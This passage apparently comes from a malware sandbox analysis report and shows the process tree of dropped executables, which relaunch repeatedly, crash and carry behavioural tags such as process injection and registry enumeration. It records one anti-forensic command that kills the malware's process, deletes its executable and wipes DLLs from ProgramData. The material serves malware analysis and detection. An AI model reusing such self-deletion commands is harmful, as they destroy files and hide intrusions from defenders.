C:\Users\Admin\Documents\xsX_K9gzdoPQHq2lB6Th8U3h.exe"C:\Users\Admin\Documents\xsX_K9gzdoPQHq2lB6Th8U3h.exe"3⤵PID:2972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im xsX_K9gzdoPQHq2lB6Th8U3h.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xsX_K9gzdoPQHq2lB6Th8U3h.exe" & del C:\ProgramData\*.dll & exit4⤵PID:5156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xsX_K9gzdoPQHq2lB6Th8U3h.exe /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:9936
-
-
-
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe"C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3212 -
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
PID:5076
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
PID:5168
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
PID:5636
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
PID:3492
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
PID:4900 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1640
-
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:1228
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6304
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5316
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6772
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6840
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:1516
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:1908
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6496
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6172
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7420
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8008
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7852
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3608
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7868
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:3412
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:4540
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8528
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8284
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5760
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9408
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9484 -s 284⤵
- Program crash
- Enumerates system info in registry
PID:7784
-
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9948
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5524
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5824
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:552
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6036
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:440
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:3688
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5596
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:3692
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6224
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8456
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:1724
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:4312
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:3928
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10632
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11164
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7488
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11080
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8632
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9300
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11116
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8356
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:4928
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:2596
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8792
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6012
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10904
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3572
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5068
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8272
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10056
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 284⤵
- Program crash
- Enumerates system info in registry
PID:9720
-
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9128
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9364
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10776
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9208
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8444
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9248
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5256
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7984
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10476
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8704
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5044
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:9204
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:4404
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8656
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9776
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7556
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10316
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Executes dropped EXE
PID:5064
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11156
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10808
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9708
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8936
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7964
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9508
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8488
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:4736
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7032
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:4020
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5612
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:1520
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7216
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9476
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5788
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10348
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:4888
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6156
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5200
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6740
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:6996
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9760
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:9836
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:1704
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8088
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10340
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12460
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12976
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12716
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5676
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:5848
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12680
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7460
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13228
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:444
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13136
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8108
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4004
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:8384
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13680
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:14292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14292 -s 284⤵
- Program crash
- Enumerates system info in registry
PID:14064
-
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10200
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:1032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 284⤵
- Program crash
- Checks processor information in registry
PID:13872
-
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13732
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13040
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:7364
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13424
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:14140
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13616
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12932
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11704
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13040
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12384
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11372
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:9192
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13088
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13836
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12236
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10536
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:10692
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:11612
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵
- Checks processor information in registry
PID:13896
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:13060
-
-
C:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exeC:\Users\Admin\Documents\s6XkU3VdWErp3FIa9CIA2Ojx.exe3⤵PID:12740
-
-
